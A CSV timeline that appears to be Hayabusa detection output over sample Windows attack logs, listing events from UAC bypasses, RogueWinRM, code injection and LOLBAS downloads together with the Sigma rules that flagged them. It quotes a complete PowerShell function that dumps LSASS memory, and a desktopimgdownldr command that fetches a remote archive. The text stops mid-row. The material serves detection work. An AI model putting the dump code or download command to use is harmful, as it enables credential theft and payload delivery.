+00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:22:26.650 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:22:26.650 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 15:06:49.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.019 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.183 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.184 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.184 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.211 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.447 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:28:16.122 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 00:28:52.873 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 00:28:52.914 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 00:28:52.950 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 01:13:47.756 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:48.864 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:50.327 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:50.330 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:51.206 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:51.206 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,low,Disc,Suspicious Process Discovery With Get-Process,,rules/sigma/powershell/powershell_script/posh_ps_susp_get_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 20:50:25.546 +00:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-06-30 20:50:25.546 +00:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/proc_access_win_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-06-30 20:50:25.546 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-02 17:51:37.819 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.819 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.822 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.872 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.872 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.872 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 18:00:29.615 +00:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.615 +00:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.617 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 08:47:20.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:20.037 +00:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:20.073 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:20.073 +00:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:21.491 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:21.491 +00:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/file_event_win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:55:49.123 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 09:05:58.278 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: 